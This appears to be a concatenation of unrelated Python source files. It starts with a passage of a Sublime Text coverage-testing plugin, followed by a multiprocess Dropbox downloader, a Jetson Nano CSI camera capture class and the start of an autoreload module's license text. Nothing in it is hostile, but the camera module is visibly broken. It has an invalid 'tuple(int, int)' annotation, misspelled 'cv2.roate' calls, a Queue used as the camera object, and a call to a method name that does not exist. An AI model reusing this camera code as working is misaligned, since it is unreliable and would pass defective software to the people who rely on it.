INTO coverage_results ( project, commit_hash, commit_summary, commit_date, data, platform, python_version, path_prefix, output ) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ? ) """, ( package_name, commit_hash, summary, commit_date, data_bytes, platform, python_version, path_prefix, output )) connection.commit() cursor.close() print('Package Coverage: saved results to coverage database') def done_running_tests(): if self.do_coverage: panel_queue.write('\n') cov.stop() thread_vars['cov_data'] = cov.get_data() buffer = StringIO() cov.report(show_missing=False, file=buffer) old_length = len(package_dir) new_length = len(package_name) + 2 output = buffer.getvalue() thread_vars['all_short'] = False thread_vars['short_package_dir'] = None if sys.platform == 'win32': thread_vars['short_package_dir'] = create_short_path(package_dir) thread_vars['all_short'] = True new_root = '.' + os.sep + package_name new_output = [] for line in output.splitlines(): if re.search('\\s+\\d+\\s+\\d+\\s+\\d+%$', line): if not thread_vars['short_package_dir']: line = line.replace(package_dir, new_root) else: for possible_prefix in [package_dir, thread_vars['short_package_dir']]: if line.startswith(possible_prefix): line = line.replace(possible_prefix, new_root) if possible_prefix == package_dir: thread_vars['all_short'] = False break new_output.append(line) output = '\n'.join(new_output) if thread_vars['all_short']: old_length = len(thread_vars['short_package_dir']) # Shorten the file paths to be relative to the Packages dir output = output.replace('\n' + ('-' * old_length), '\n' + ('-' * new_length)) output = output.replace('Name' + (' ' * (old_length - 4)), 'Name' + (' ' * (new_length - 4))) output = output.replace('TOTAL' + (' ' * (old_length - 5)), 'TOTAL' + (' ' * (new_length - 5))) panel_queue.write(output) if self.html_report: coverage_reports_dir = os.path.join(package_dir, 'dev', 'coverage_reports') if not os.path.exists(coverage_reports_dir): os.mkdir(coverage_reports_dir) report_dir = os.path.join(coverage_reports_dir, 'temp') if not os.path.exists(report_dir): os.mkdir(report_dir) title = '%s coverage report' % package_name cov.html_report(directory=report_dir, title=title) html_path = os.path.join(report_dir, 'index.html') if sys.platform != 'win32': html_path = 'file://' + html_path webbrowser.open_new(html_path) panel_queue.write('\x04') threading.Thread( target=display_results, args=(title, panel, panel_queue, db_results_file, done_displaying_results) ).start() if self.ui_thread: run_tests(tests_module, panel_queue, self.name_pattern, done_running_tests) else: threading.Thread( target=run_tests, args=(tests_module, panel_queue, self.name_pattern, done_running_tests) ).start() class PackageCoverageSetDatabasePathCommand(sublime_plugin.WindowCommand): """ Allows the user to set the path to the sqlite database to store coverage data inside of """ def run(self): self.has_project_api = int(sublime.version()) >= 3000 self.has_project = False if self.has_project_api: self.has_project = len(self.window.project_file_name()) > 0 coverage_settings = sublime.load_settings('Package Coverage.sublime-settings') example_location = os.path.expanduser(os.path.join('~', 'Dropbox', 'package_coverage.sqlite')) existing_coverage_database = get_setting( self.window, coverage_settings, 'coverage_database', example_location ) if self.has_project: self.caption = 'Project-Specific Coverage Database Path' else: self.caption = 'User-Specific Coverage Database Path' self.show_input(existing_coverage_database) def show_input(self, initial): """ Displays the input panel to allow the user to specify the coverage database file path :param initial: A unicode string of the path that should initially populate the input field """ self.window.show_input_panel( self.caption, initial, self.on_done, None, None ) def on_done(self, requested_path): """ User input handler for file path to coverage database :param requested_path: A string containing the path the user entered for the coverage db """ requested_dirname = os.path.dirname(requested_path) requested_basename = os.path.basename(requested_path) if requested_basename == '': sublime.error_message(format_message(''' Package Coverage No filename provided for coverage database ''')) self.show_input(requested_path) return if not os.path.exists(requested_dirname) or not os.path.dirname(requested_dirname): sublime.error_message(format_message( ''' Package Coverage Folder provided for coverage database does not exist: %s ''', [requested_dirname] )) self.show_input(requested_path) return if self.has_project: project_data = self.window.project_data() if 'settings' not in project_data: project_data['settings'] = {} if 'Package Coverage' not in project_data['settings']: project_data['settings']['Package Coverage'] = {} project_data['settings']['Package Coverage']['coverage_database'] = requested_path self.window.set_project_data(project_data) else: coverage_settings = sublime.load_settings('Package Coverage.sublime-settings') coverage_settings.set('coverage_database', requested_path) sublime.save_settings('Package Coverage.sublime-settings') sublime.status_message('Package Coverage coverage database path saved') class PackageCoverageDisplayReportCommand(sublime_plugin.WindowCommand): """ Allows the user to pick a commit and show a report of coverage details in their browser """ def run(self): testable_packages = find_testable_packages() if not testable_packages: sublime.error_message(format_message(''' Package Coverage No testable packages could be found ''')) return settings = sublime.load_settings('Package Coverage.sublime-settings') self.coverage_database = get_setting(self.window, settings, 'coverage_database') self.packages = testable_packages self.window.show_quick_panel(testable_packages, self.selected_package) def selected_package(self, index): """ User input handler for user selecting package :param index: An integer index of the package name in self.packages - -1 indicates user cancelled operation """ if index == -1: return package_name = self.packages[index] settings = sublime.load_settings('Package Coverage.sublime-settings') coverage_database = get_setting(self.window, settings, 'coverage_database') self.package_name = package_name self.coverage_database = coverage_database thread = threading.Thread(target=self.find_commits, args=(package_name, coverage_database)) thread.start() def find_commits(self, package_name, coverage_database): """ Queries the SQLite coverage database to fetch commits the use can pick from. RUNS IN A THREAD :param package_name: A unicode string of the package name :param coverage_database: The filename of the coverage database """ connection = open_database(coverage_database) cursor = connection.cursor() cursor.execute(""" SELECT commit_hash, MAX(commit_date) AS commit_date, MAX(commit_summary) AS commit_summary FROM coverage_results WHERE project = ? GROUP BY project, commit_hash ORDER BY MAX(commit_date) DESC """, (package_name,)) hashes = [] titles = [] for row in cursor: title = '%s %s (%s)' % ( row['commit_hash'], row['commit_summary'], re.sub('\\..*$', '', row['commit_date']) ) hashes.append(row['commit_hash']) titles.append(title) cursor.close() connection.close() # Since this method is running in a thread, we schedule the results in # the main Sublime Text UI thread sublime.set_timeout(lambda: self.show_commits(hashes, titles), 10) def show_commits(self, commit_hashes, commit_titles): """ Displays a list of commits with coverage results for the specified package :param commit_hashes: A list of unicode strings of git SHA1 hashes :param commit_titles: A list of unicode strings of commit titles for the user to pick from """ if not commit_hashes: sublime.error_message(format_message( ''' Package Coverage No coverage results exists for %s ''', [self.package_name] )) return self.hashes = commit_hashes self.titles = commit_titles self.window.show_quick_panel(commit_titles, self.selected_commit) def selected_commit(self, index): """ User input handler for quick panel selection of commit hash :param index: An integer of the commit chosen from self.hashes - -1 indicates that the user cancelled the operation """ if index == -1: return commit_hash = self.hashes[index] package_dir = os.path.join(sublime.packages_path(), self.package_name) args = (self.package_name, package_dir, self.coverage_database, commit_hash) thread = threading.Thread(target=self.generate_report, args=args) thread.start() def generate_report(self, package_name, package_dir, coverage_database, commit_hash): """ Loads all of the coverage data in the database for the commit specified and generates an HTML report, opening it in the user's web browser RUNS IN A THREAD :param package_name: A unicode string of the package to generate the report for :param package_dir: A unicode string of the path to the package's directory :param coverage_database: A unicode string of the path to the SQLite coverage database :param commit_hash: A unicode string of the git SHA1 hash of the commit to display the results for """ connection = open_database(coverage_database) cursor = connection.cursor() cursor.execute(""" SELECT path_prefix, data, commit_summary FROM coverage_results WHERE project = ? AND commit_hash = ? ORDER BY commit_date ASC """, (package_name, commit_hash)) commit_summary = None data = coverage.CoverageData() for row in cursor: if commit_summary is None: commit_summary = row['commit_summary'] byte_string = StringIO() byte_string.write(row['data']) byte_string.seek(0) temp_data = coverage.CoverageData() temp_data.read_fileobj(byte_string) aliases = coverage.files.PathAliases() aliases.add(row['path_prefix'], package_dir + os.sep) data.update(temp_data, aliases) cursor.close() connection.close() coverage_reports_dir = os.path.join(package_dir, 'dev', 'coverage_reports') if not os.path.exists(coverage_reports_dir): os.mkdir(coverage_reports_dir) report_dir = os.path.join(coverage_reports_dir, commit_hash) if not os.path.exists(report_dir): os.mkdir(report_dir) data_file_path = os.path.join(report_dir, '.coverage') data.write_file(data_file_path) cov = coverage.Coverage(data_file=data_file_path) cov.load() title = '%s (%s %s) coverage report' % (package_name, commit_hash, commit_summary) cov.html_report(directory=report_dir, title=title) html_path = os.path.join(report_dir, 'index.html') if sys.platform != 'win32': html_path = 'file://' + html_path webbrowser.open_new(html_path) class PackageCoverageCleanupReportsCommand(sublime_plugin.WindowCommand): """ Deletes all HTML coverage reports currently on disk """ def run(self): testable_packages = find_testable_packages() if not testable_packages: sublime.error_message(format_message(''' Package Coverage No cleanable packages could be found ''')) return self.packages_path = sublime.packages_path() cleanable_packages = [] for testable_package in testable_packages: coverage_reports_dir = os.path.join(self.packages_path, testable_package, 'dev', 'coverage_reports') if not os.path.exists(coverage_reports_dir): continue has_dir = False for entry in os.listdir(coverage_reports_dir): if entry in set(['.', '..']): continue if not os.path.isdir(os.path.join(coverage_reports_dir, entry)): continue has_dir = True break if has_dir: cleanable_packages.append(testable_package) if not cleanable_packages: sublime.error_message(format_message(''' Package Coverage No cleanable packages could be found ''')) return self.packages = cleanable_packages self.window.show_quick_panel(cleanable_packages, self.selected_package) def selected_package(self, index): """ User input handler for user selecting package :param index: An integer index of the package name in self.packages - -1 indicates user cancelled operation """ if index == -1: return package_name = self.packages[index] coverage_reports_dir = os.path.join(self.packages_path, package_name, 'dev', 'coverage_reports') thread = threading.Thread(target=self.clean_dirs, args=(package_name, coverage_reports_dir)) thread.start() def clean_dirs(self, package_name, coverage_reports_dir): """ Deletes old coverage report dirs from a package's dev/coverage_reports/ directory. RUNS IN A THREAD :param package_name: A unicode string of the package name :param coverage_reports_dir: A unicode string of the path to the directory to clean out """ for entry in os.listdir(coverage_reports_dir): if entry in set(['.', '..']): continue entry_path = os.path.join(coverage_reports_dir, entry) if not os.path.isdir(entry_path): continue if not re.match('^[a-f0-9]{6,}$', entry): continue shutil.rmtree(entry_path) # Since this method is running in a thread, we schedule the result # notice to be run from the main UI thread def show_completed(): message = 'Package Coverage: coverage reports successfully cleaned for %s' % package_name sublime.status_message(message) sublime.set_timeout(show_completed, 10) def get_setting(window, settings, name, default=None): """ Retrieves a setting from the current project, of the editor-wide Package Coverage settings file. :param window: The current sublime.Window object :param settings: The sublime.Settings object for Package Coverage.sublime-settings :param name: A unicode string of the name of the setting to retrieve :param default: A the value to use if the setting is not currently set :return: The setting value, or the default value """ window_settings = window.active_view().settings().get('Package Coverage', {}) if name in window_settings: return window_settings[name] return settings.get(name, default) class StringQueue(): """ An output data sink for unittest that is used to fetch output to display in an output panel """ def __init__(self): self.lock = threading.Lock() self.queue = '' def write(self, data): self.lock.acquire() self.queue += data self.lock.release() def get(self): self.lock.acquire() output = self.queue self.queue = '' self.lock.release() return output def flush(self): pass def create_resources(window, package_name, package_dir): """ Prepares resources to run tests, including: 1. Loading the dev/tests.py module from a package 2. Creating a sublime.View output panel to display the results :param window: A sublime.Window object that the output panel will be created within :param package_name: A unicode string of the name of the package to test :param package_dir: A unicode string of the filesystem path to the folder containing the package :return: A 2-element tuple of: (tests module, sublime.View object) """ panel = window.get_output_panel('%s_tests' % package_name) panel.settings().set('word_wrap', True) panel.settings().set("auto_indent", False) panel.settings().set("tab_width", 2) if sys.version_info >= (3,): old_path = os.getcwd() else: old_path = os.getcwdu() reloader_path = os.path.join(package_dir, 'dev', 'reloader.py') os.chdir(package_dir) dev_module_name = '%s.dev' % package_name tests_module_name = '%s.dev.tests' % package_name reloader_module_name = '%s.dev.reloader' % package_name if os.path.exists(reloader_path): if reloader_module_name in sys.modules: reload(sys.modules[reloader_module_name]) else: reloader_module_info = imp.find_module('reloader', [os.path.join(package_dir, 'dev')]) imp.load_module(reloader_module_name, *reloader_module_info) if tests_module_name in sys.modules: tests_module = sys.modules[tests_module_name] reload(tests_module) else: dev_module_info = imp.find_module('dev', [package_dir]) imp.load_module(dev_module_name, *dev_module_info) tests_module_info = imp.find_module('tests', [os.path.join(package_dir, 'dev')]) tests_module = imp.load_module(tests_module_name, *tests_module_info) os.chdir(old_path) return (tests_module, panel) def display_results(headline, panel, panel_queue, db_results_file, on_done): """ Displays the results of a test run :param headline: A unicode string title to display in the output panel :param panel: A sublime.View to write the results to :param panel_queue: The StringQueue object to fetch test results from :param db_results_file: None or a StringIO object so output can be saved in the coverage database :param on_done: A callback to execute when the results are done being printed """ # We use a function here so that chars is not redefined in the while # loop before the timeout get fired if sys.version_info >= (3,): def write_to_panel(chars): sublime.set_timeout(lambda: panel.run_command('insert', {'characters': chars}), 10) else: def do_write(chars): edit = panel.begin_edit('package_coverage_insert', []) panel.insert(edit, panel.size(), chars) panel.end_edit(edit) def write_to_panel(chars): sublime.set_timeout(lambda: do_write(chars), 10) write_to_panel('%s\n\n ' % headline) while True: chars = panel_queue.get() wrapped_chars = chars.replace('\n', '\n ') if chars == '': time.sleep(0.05) continue if chars[-1] == '\x04': chars = chars[0:-1] if db_results_file: db_results_file.write(chars) wrapped_chars = wrapped_chars[0:-1] write_to_panel(wrapped_chars) break if db_results_file: db_results_file.write(chars) write_to_panel(wrapped_chars) on_done() def run_tests(tests_module, queue, name_pattern, on_done): """ Executes the tests within a module and sends the output through the queue for display via another thread :param tests_module: The module that contains unittest.TestCase classes to execute :param queue: A StringQueue object to send the results to :param name_pattern: None or a re._pattern_type object for matching test names against :param on_done: A callback to execute when the tests are done being run """ test_classes = [] for name, obj in inspect.getmembers(tests_module): if inspect.isclass(obj) and issubclass(obj, unittest.TestCase): test_classes.append(obj) suite = unittest.TestSuite() loader = unittest.TestLoader() for test_class in test_classes: if name_pattern: for name in loader.getTestCaseNames(test_class): if name_pattern.search(name): suite.addTest(test_class(name)) else: suite.addTest(loader.loadTestsFromTestCase(test_class)) verbosity = 2 if name_pattern else 1 unittest.TextTestRunner(stream=queue, verbosity=verbosity).run(suite) on_done() def git_commit_info(package_dir): """ Get the git SHA1 hash, commit date and summary for the current git commit :param package_dir: A unicode string of the filesystem path to the folder containing the package :return: A tuple containing: [0] A unicode string of the short commit hash [1] A datetime.datetime object of the commit date [2] A unicode string of the commit message summary """ startupinfo = None if sys.platform == 'win32': startupinfo = subprocess.STARTUPINFO() startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW _, env = shellenv.get_env(for_subprocess=True) proc = subprocess.Popen( ['git', 'log', '-n', '1', "--pretty=format:%h %at %s", 'HEAD'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, cwd=package_dir, startupinfo=startupinfo ) stdout, stderr = proc.communicate() if stderr: raise OSError(stderr.decode('utf-8').strip()) parts = stdout.decode('utf-8').strip().split(' ', 2) return (parts[0], datetime.utcfromtimestamp(int(parts[1])), parts[2]) def is_git_clean(package_dir): """ Detects if the git repository is currently all committed :param package_dir: A unicode string of the filesystem path to the folder containing the package :return: A boolean - if the repository is clean """ startupinfo = None if sys.platform == 'win32': startupinfo = subprocess.STARTUPINFO() startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW _, env = shellenv.get_env(for_subprocess=True) proc = subprocess.Popen( ['git', 'status', '--porcelain'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, cwd=package_dir, startupinfo=startupinfo ) stdout, stderr = proc.communicate() if stderr: raise OSError(stderr.decode('utf-8').strip()) return len(stdout.decode('utf-8').strip()) == 0 def open_database(coverage_database): """ Opens and, if needed, initializes the coverage database for saving results :param coverage_database: A unicode string of the path to the sqlite file to use as the database :return: A Python sqlite3.Connection object """ connection = sqlite3.connect(coverage_database, detect_types=sqlite3.PARSE_DECLTYPES) connection.row_factory = sqlite3.Row cursor = connection.cursor() cursor.execute(""" SELECT name FROM sqlite_master WHERE type = 'table' AND name = 'coverage_results' """) if len(cursor.fetchall()) != 1: if sys.version_info >= (3,): sql_bytes = sublime.load_binary_resource('Packages/Package Coverage/coverage.sql') else: dirname = os.path.dirname(__file__) with open(os.path.join(dirname, 'coverage.sql'), 'rb') as f: sql_bytes = f.read() sql = sql_bytes.decode('utf-8') cursor.execute(sql) cursor.close() return connection def find_testable_packages(): """ Returns a list of unicode strings containing testable packages :return: A list of unicode strings of package names """ testable_packages = [] packages_dir = sublime.packages_path() for name in os.listdir(packages_dir): if name[0] == '.': continue subdir_path = os.path.join(packages_dir, name) if not os.path.isdir(subdir_path): continue tests_path = os.path.join(subdir_path, 'dev', 'tests.py') if not os.path.exists(tests_path): continue testable_packages.append(name) return testable_packages def format_message(string, params=None, strip=True, indent=None): """ Takes a multi-line string and does the following: - dedents - removes a single leading newline if the second character is not a newline also - converts newlines with text before and after into a single line - removes a single trailing newline if the second-to-laster character is not a newline also :param string: The string to format :param params: Params to interpolate into the string :param strip: If the last newline in the string should be removed :param indent: If all lines should be indented by a set indent after being dedented :return: The formatted string """ output = string # Only dedent if not a single-line string. This allows for # single-line-formatted string to be printed that include intentional # whitespace. if output.find('\n') != -1: output = dedent(output) # If the string starts with just a newline, we want to trim it because # it is a side-effect of the code formatting, but if there are two newlines # then that means we intended there to be newlines at the beginning if output[0] == '\n' and output[1] != '\n': output = output[1:] # Unwrap lines, taking into account bulleted lists, ordered lists and # underlines consisting of = signs if output.find('\n') != -1: output = re.sub('(?<=\\S)\n(?=[^ \n\t\\d\\*\\-=])', ' ', output) # By default we want to trim a single trailing newline from a string since # that is likely from the code formatting, but that trimming is prevented # if strip == False, or if there are two trailing newlines, which means we # actually wanted whitespace at the end if output[-1] == '\n' and strip and output[-2] != '\n': output = output[0:-1] if params is not None: output = output % params if indent is not None: output = indent + output.replace('\n', '\n' + indent) return output if sys.platform == 'win32': def create_short_path(path): """ Returns the 8.3 formatted version of a path, if available :param path: A unicode string of a file path :return: None if no 8.3 path, otherwise a unicode string of the short path """ short_path = path buf = create_unicode_buffer(512) if windll.kernel32.GetShortPathNameW(path, buf, len(buf)): short_path = buf.value if short_path != path: return short_path return None
downloader.py
import os import sqlite3 from getpass import getpass import multiprocessing import dropbox from tqdm import tqdm import pathlib def wrapper(token: str, arg_list, queue: multiprocessing.Queue): dbx = dropbox.Dropbox(token) for (dropbox_path, download_path) in arg_list: try: dbx.files_download_to_file(download_path, dropbox_path) queue.put(dropbox_path) except Exception as e: print(e) def main(): if 'DROPBOX_TOKEN' in os.environ: _token = os.environ['DROPBOX_TOKEN'] else: _token = getpass('Enter your access token: ') p = pathlib.Path('task_list_db.sqlite') if not p.exists(): raise FileNotFoundError('task_list_db.sqlite not found') sql = sqlite3.connect(p) tasks = sql.execute('SELECT DROPBOX_PATH, DOWNLOAD_PATH FROM TASKS WHERE STATUS = 0').fetchall() num_procs = 8 queue: multiprocessing.Queue = multiprocessing.Queue() lists = [tasks[len(tasks) // num_procs * i: len(tasks) // num_procs * (i + 1)] for i in range(num_procs - 1)] lists.append(tasks[len(tasks) // num_procs * (num_procs - 1):]) procs = [multiprocessing.Process(target=wrapper, args=(_token, x, queue)) for x in lists] for proc in procs: proc.start() for _i in tqdm(range(len(tasks))): done_dropbox_path = queue.get() sql.execute('UPDATE TASKS SET STATUS = 1 WHERE DROPBOX_PATH = ?', (done_dropbox_path,)) sql.commit() tqdm.write(done_dropbox_path) for proc in procs: proc.join() sql.close() print('Done!') if __name__ == '__main__': main()
nanocapture.py
############################################################################### # CSI video capture on Jetson Nano using gstreamer # Latency can be 100-200ms # Urs Utzinger, # # 2021, Initialize # 2020, Update Queue # 2019, First release ############################################################################### ############################################################################### # Imports ############################################################################### # Multi Threading from threading import Thread, Lock from queue import Queue # System import logging, time, os # Open Computer Vision import cv2 ############################################################################### # Video Capture ############################################################################### class nanoCapture(Thread): """ This thread continually captures frames from a CSI camera on Jetson Nano """ # Initialize the Camera Thread # Opens Capture Device and Sets Capture Properties def __init__(self, configs, camera_num: int = 0, res: tuple(int, int) = None, exposure: float = None): # populate desired settings from configuration file or function call #################################################################### self.camera_num = camera_num if exposure is not None: self._exposure = exposure else: self._exposure = configs['exposure'] if res is not None: self._camera_res = res else: self._camera_res = configs['camera_res'] self._capture_width = self._camera_res[0] self._capture_height = self._camera_res[1] self._output_res = configs['output_res'] self._output_width = self._output_res[0] self._output_height = self._output_res[1] self._framerate = configs['fps'] self._flip_method = configs['flip'] # Threading Queue self.capture = Queue(maxsize=32) self.log = Queue(maxsize=32) self.stopped = True self.cam_lock = Lock() # open up the camera self._open_cam() # Init vars self.frame_time = 0.0 self.measured_fps = 0.0 Thread.__init__(self) # Thread routines # Start Stop and Update Thread ################################################################### def stop(self): """stop the thread""" self.stopped = True def start(self, capture_queue = None): """set the thread start conditions""" self.stopped = False T = Thread(target=self.update) T.daemon = True # run in background T.start() # After Stating of the Thread, this runs continously def update(self): """run the thread""" last_time = time.time() num_frames = 0 while not self.stopped: current_time = time.time() # Get New Image if self.cam is not None: with self.cam_lock: _, img = self.capture.read() num_frames += 1 self.frame_time = int(current_time*1000) if (img is not None) and (not self.capture.full()): if (self._output_height > 0) or (self._flip_method > 0): # adjust output height img_resized = cv2.resize(img, self._output_res) # flip resized image if self._flip_method == 0: # no flipping img_proc = img_resized elif self._flip_method == 1: # ccw 90 img_proc = cv2.roate(img_resized, cv2.ROTATE_90_COUNTERCLOCKWISE) elif self._flip_method == 2: # rot 180, same as flip lr & up img_proc = cv2.roate(img_resized, cv2.ROTATE_180) elif self._flip_method == 3: # cw 90 img_proc = cv2.roate(img_resized, cv2.ROTATE_90_CLOCKWISE) elif self._flip_method == 4: # horizontal img_proc = cv2.flip(img_resized, 0) elif self._flip_method == 5: # upright diagonal. ccw & lr img_proc = cv2.flip(cv2.roate(img_resized, cv2.ROTATE_90_COUNTERCLOCKWISE), 1) elif self._flip_method == 6: # vertical img_proc = cv2.flip(img_resized, 1) elif self._flip_method == 7: # upperleft diagonal img_proc = cv2.transpose(img_resized) else: img_proc = img_resized # not a valid flip method else: img_proc = img self.capture.put_nowait((current_time*1000., img_proc)) else: self.log.put_nowait((logging.WARNING, "NanoCap:Capture Queue is full!")) # FPS calculation if (current_time - last_time) >= 5.0: # update frame rate every 5 secs self.measured_fps = num_frames/5.0 self.log.put_nowait((logging.INFO, "NANOCAM:FPS:{}".format(self.measured_fps))) last_time = current_time num_frames = 0 self.cam.release() def gstreamer_pipeline( capture_width=1920, capture_height=1080, output_width=1280, output_height=720, framerate=30, exposure_time=-1, # microseconds flip_method=0): """ Create gstreamer pipeline string """ ################################################################################### # gstreamer Options # Examples for IX279 ################################################################################### # 'timeout=0 ' # 0 - 2147483647 # 'blocksize=-1 ' # block size in bytes # 'num-buffers=-1 ' # -1..2147483647 (-1=ulimited) # # num buf before sending EOS # 'sensor-mode=-1 ' # -1..255, IX279 # # 0 (3264x2464,21fps) # # 1 (3264x1848,28fps) # # 2 (1080p, 30fps) # # 3 (720p, 60fps) # # 4 (720p, 120fps) # 'tnr-strength=-1 ' # -1..1 # 'tnr-mode=1 ' # 0,1,2 # # edge enhancement does not accept settings # #'ee-mode=0' # 0,1,2 # #'ee-strength=-1 ' # -1..1 # 'aeantibanding=1 ' # 0..3, off,auto,50,60Hz # 'bufapi-version=false ' # new buffer api # 'maxperf=true ' # max performance # 'silent=true ' # verbose output # 'saturation=1 ' # 0..2 # 'wbmode=1 ' # white balance mode, 0..9 0=off 1=auto # 'awblock=false ' # auto white balance lock # 'aelock=true ' # auto exposure lock # 'exposurecompensation=0 ' # -2..2 # 'exposuretimerange=' # # 'gainrange="1.0 10.625" ' # "1.0 10.625" # 'ispdigitalgainrange="1 8" ' # 'flip-method=0 # Flip options # # 0=norotation # # 1=ccw90deg # # 2=rotation180 # # 3=cw90 # # 4=horizontal # # 5=uprightdiagonal flip # # 6=vertical # # 7=uperleft flip ################################################################################### if exposure_time <= 0: # auto exposure ################ nvarguscamerasrc_str = ( 'nvarguscamerasrc ' + 'do-timestamp=true ' + 'maxperf=false ' + 'silent=true ' + 'awblock=false ' + 'aelock=false ' + 'exposurecompensation=0 ') else: # static exposure ################# exposure_time = exposure_time * 1000 # microseconds to ns exp_time_str = '"' + str(exposure_time) + ' ' + str(exposure_time) + '" ' nvarguscamerasrc_str = ( 'nvarguscamerasrc ' + 'name="NanoCam" ' + 'do-timestamp=true ' + 'timeout=0 ' + 'blocksize=-1 ' + 'num-buffers=-1 ' + 'sensor-mode=-1 ' + 'tnr-strength=-1 ' + 'tnr-mode=1 ' + 'aeantibanding=1 ' + 'bufapi-version=false ' + 'maxperf=true ' + 'silent=true ' + 'saturation=1 ' + 'wbmode=1 ' + 'awblock=false ' + 'aelock=true ' + 'exposurecompensation=0 ' + 'exposuretimerange=' + exp_time_str) # deal with auto resizing if output_height <= 0: output_height = capture_height if output_width <=0: output_width = capture_width gstreamer_str = ( '! video/x-raw(memory:NVMM), ' + 'width=(int){:d}, '.format(capture_width) + 'height=(int){:d}, '.format(capture_height) + 'format=(string)NV12, ' + 'framerate=(fraction){:d}/1 '.format(framerate) + '! nvvidconv flip-method={:d} '.format(flip_method) + '! video/x-raw, width=(int){:d}, height=(int){:d}, format=(string)BGRx '.format(output_width,output_height) + '! videoconvert ' + '! video/x-raw, format=(string)BGR ' + '! appsink') return ( nvarguscamerasrc_str + gstreamer_str ) # # Setup the Camera ############################################################################ def _open_capture(self): """ Open up the camera so we can begin capturing frames """ self.gst=self.gstreamer_pipeline( capture_width = self._capture_width, capture_height = self._capture_height, output_width = self._output_width, output_height = self._output_height, framerate = self._framerate, exposure_time = self._exposure, flip_method = self._flip_method) self.log.put_nowait((logging.INFO, self.gst)) self.cam = cv2.VideoCapture(self.gst, cv2.CAP_GSTREAMER) self.cam_open = self.cam.isOpened() if not self.cam_open: self.log.put_nowait((logging.CRITICAL, "NanoCap:Failed to open camera!")) # Camera Routines ################################################################## # OpenCV interface # Works for Sony IX219 #cap.get(cv2.CAP_PROP_BRIGHTNESS) #cap.get(cv2.CAP_PROP_CONTRAST) #cap.get(cv2.CAP_PROP_SATURATION) #cap.get(cv2.CAP_PROP_HUE) #cap.get(cv2.CAP_PROP_FRAME_WIDTH) #cap.get(cv2.CAP_PROP_FRAME_HEIGHT) #cap.get(cv2.CAP_PROP_FPS) #V4L2 interface #Works for Sonty IX219 #v4l2-ctl --set-ctrl exposure= 13..683709 #v4l2-ctl --set-ctrl gain= 16..170 #v4l2-ctl --set-ctrl frame_rate= 2000000..120000000 #v4l2-ctl --set-ctrl low_latency_mode=True #v4l2-ctl --set-ctrl bypass_mode=Ture #os.system("v4l2-ctl -c exposure_absolute={} -d {}".format(val,self.camera_num)) # Read properties @property def exposure(self): if self.cam_open: return self.capture._exposure else: return float("NaN") @exposure.setter def exposure(self, val): if val is None: return val = int(val) self._exposure = val if self.cam_open: with self.cam_lock: os.system("v4l2-ctl -c exposure_absolute={} -d {}".format(val, self.camera_num)) self.log.put_nowait((logging.INFO, "NanoCap:Exposure:{}".format(self._exposure))) else: self.log.put_nowait((logging.ERROR, "NanoCap:Failed to set exposure to{}!".format(val))) ############################################################################### # Testing ############################################################################### if __name__ == '__main__': configs = { 'camera_res' : (1280, 720), # width & height 'exposure' : 10000, # microseconds, internally converted to nano seconds, <= 0 autoexposure 'fps' : 60, # 'output_res' : (-1, -1), # Output resolution 'flip' : 4, # 0=norotation # 1=ccw90deg # 2=rotation180 # 3=cw90 # 4=horizontal # 5=upright diagonal flip # 6=vertical # 7=uperleft diagonal flip 'displayfps' : 30 } logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger("Nano Capture") logger.log(logging.DEBUG, "Starting Capture") camera = nanoCapture(configs, camera_num=0) camera.start() logger.log(logging.DEBUG, "Getting Frames") window_handle = cv2.namedWindow("Nano CSI Camera", cv2.WINDOW_AUTOSIZE) while cv2.getWindowProperty("Nano CSI Camera", 0) >= 0: try: (frame_time, frame) = camera.capture.get() cv2.imshow('Nano CSI Camera', frame) except: pass if cv2.waitKey(1) & 0xFF == ord('q'): break try: (level, msg)=camera.log.get_nowait() logger.log(level, "NanoCap:{}".format(msg)) except: pass camera.stop() cv2.destroyAllWindows()
autoreload.py
""" Autoreloading Launcher Borrowed/adapted from Django Autoreload Utility (https://github.com/django/django/...autoreload.py) Borrowed from Peter Hunt and the CherryPy project (http://www.cherrypy.org). Some taken from Ian Bicking's Paste (http://pythonpaste.org/). Portions copyright (c) 2004, CherryPy Team (team@cherrypy.org). All rights reserved. Portions copyright (c) 2017, Django Software Foundation and individual contributors. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions, and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions, and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the Django or the CherryPy Team, nor the names of its contributors, may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. The following changes were made to the borrowed code. This is a summary only, and does not detail every minor change: - Converted to an object-oriented structure with instance variables that carry the state of the reloader instead of using `global` to modify module globals that carry the state of the reloader. - Abandoned the use of the non-standard `_thread` module in favor of the `threading` module. - Moved the reloader into a daemonic thread (it was previously in the main thread) so that PyInotify can exit when the main thread exits. Moved the main program execution into the main thread (it was previously in a non-daemonic background thread) so that it can use `signal.signal`. - Eliminated the carrying of "error files," which are no longer necessary since the main program execution now happens in the main thread. - Properly signal the main program thread to shutdown cleanly instead of killing it harshly. - Added input variables for filtering modules to monitor and for indicating the `-m` main module used to execute the program. - Renamed a bunch of variables and functions/methods to reduce ambiguity and have 